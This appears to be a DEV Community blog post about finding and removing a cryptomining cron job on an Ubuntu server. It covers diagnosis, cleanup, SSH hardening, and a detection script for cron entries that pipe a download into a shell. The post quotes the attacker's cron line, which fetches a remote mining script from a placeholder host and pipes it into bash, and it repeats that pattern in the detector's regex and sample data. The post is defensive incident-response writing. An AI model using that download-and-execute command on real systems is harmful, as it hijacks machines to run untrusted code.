DEV Community

Faruk

Posted on • Originally published at Medium

How I Found an Unknown Cron Job Mining Crypto on My Ubuntu Server | by Faruk Ahmed | Jun, 2025


Intro: It started as a slight spike in CPU usage. Nothing dramatic. But something felt…off. What I thought was a background update turned out to be a sneaky cron job mining cryptocurrency. Here’s how I caught it — and how you can protect your own Linux servers from the same fate.

1. Noticing the Signs: CPU Usage Spikes

I ran:

top

The load average was way too high for a quiet server. A mysterious kworker process and unusually high usage by cron were my first clues.

2. Listing Suspicious Cron Jobs

I checked root’s cron jobs:

sudo crontab -l

Then checked system-wide jobs:

ls -l /etc/cron.*
cat /etc/crontab

Hidden deep in /etc/cron.d/, I found a script scheduled to run every minute with a suspicious curl download followed by execution.

3. Investigating the Payload

The cron job downloaded a file from a shady-looking domain and executed it:

*/1 * * * * root curl -s http://badactor.site/xmrig.sh | bash

It was a crypto mining script using my server’s CPU to earn money — for someone else.

4. Killing the Miner and Cleaning Up

I ran:

ps aux | grep xmrig
sudo kill -9 <PID>

Then I deleted any downloaded payloads and removed the cron job.

5. Finding the Root Cause

How did it get in? I reviewed auth logs:

sudo cat /var/log/auth.log | grep ssh

Turns out, the attacker brute-forced an old, unused account that still had SSH access. Lesson learned.

6. Hardening the Server

✅ Disabled password login:

sudo nano /etc/ssh/sshd_config
# Set:
PasswordAuthentication no

✅ Used Fail2Ban to block brute-force attempts:

sudo apt install fail2ban

✅ Set up alerts for new cron jobs and processes.
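To turn the cron review from steps 2 and 3 and the "alerts for new cron jobs" item above into something repeatable, here is a small script added as an example (it is not the post's own code). It assumes the standard Ubuntu cron locations, and the crontab text at the bottom is constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: flag cron entries shaped like
# the one the post found, and checksum every cron file so a diff against a
# saved copy alerts on new jobs. Paths are the standard Ubuntu cron
# locations; the crontab text at the bottom is constructed for the demo.

# A curl/wget fetch piped straight into a shell, as in the post's entry.
PIPE_TO_SHELL='(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)'

# flag_cron_lines ORIGIN: read cron text on stdin and print "ORIGIN: line"
# for every non-comment line matching PIPE_TO_SHELL. Always returns 0.
flag_cron_lines() {
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|\#*) continue ;;   # blank lines and comments
        esac
        if printf '%s\n' "$line" | grep -Eq "$PIPE_TO_SHELL"; then
            printf '%s: %s\n' "$1" "$line"
        fi
    done
    return 0
}

# scan_cron_sources: run the check over every place cron reads jobs from,
# including the run-parts directories, whose scripts can hide the same shape.
scan_cron_sources() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* \
             /etc/cron.hourly/* /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/*; do
        if [ -r "$f" ]; then flag_cron_lines "$f" < "$f"; fi
    done
    return 0
}

# cron_snapshot: sha256 of every cron file; save once, then "diff" a fresh
# snapshot against it from a daily job to catch new or modified entries.
cron_snapshot() {
    find /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
         /etc/cron.weekly /etc/cron.monthly /var/spool/cron/crontabs \
         -type f -exec sha256sum {} + 2>/dev/null | sort
}

# Constructed demo input: one benign job and one entry like the post's.
SAMPLE_CRON='# m h dom mon dow user command
0 3 * * * root /usr/bin/apt-get update -q
*/1 * * * * root curl -s http://badactor.site/xmrig.sh | bash'

printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines sample
# → sample: */1 * * * * root curl -s http://badactor.site/xmrig.sh | bash
```

Run `scan_cron_sources` as root to cover the per-user crontabs in /var/spool/cron/crontabs, and keep the saved snapshot somewhere the cron user cannot write.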

Conclusion:

If your Linux server starts acting strange, don’t ignore it. Attackers often hide in plain sight, using cron and system tools to stay under the radar. Review your logs, check your cron jobs, and harden your system — before it’s too late.

💬 Question: What steps have you taken to monitor cron jobs and system resource usage? 🙏 Thank you for being a part of this security-aware community!

👏 Before you go: Be sure to clap and follow me!

🔗 Follow me on social media: LinkedIn: https://www.linkedin.com/in/bornaly/ Medium: https://medium.com/@bornaly/subscribe
